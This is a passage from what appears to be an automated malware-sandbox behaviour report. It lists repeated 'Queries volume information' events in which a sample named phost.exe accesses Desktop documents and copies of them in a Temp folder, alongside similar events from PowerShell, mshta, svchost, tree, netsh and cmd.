              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\NWTVCDUMOB.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ONBQCLYSPU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UMMBDNEQBN.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UOOJJOZIRH.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeQueries volume information: C:\Users\user\Desktop\UOOJJOZIRH.mp3 VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
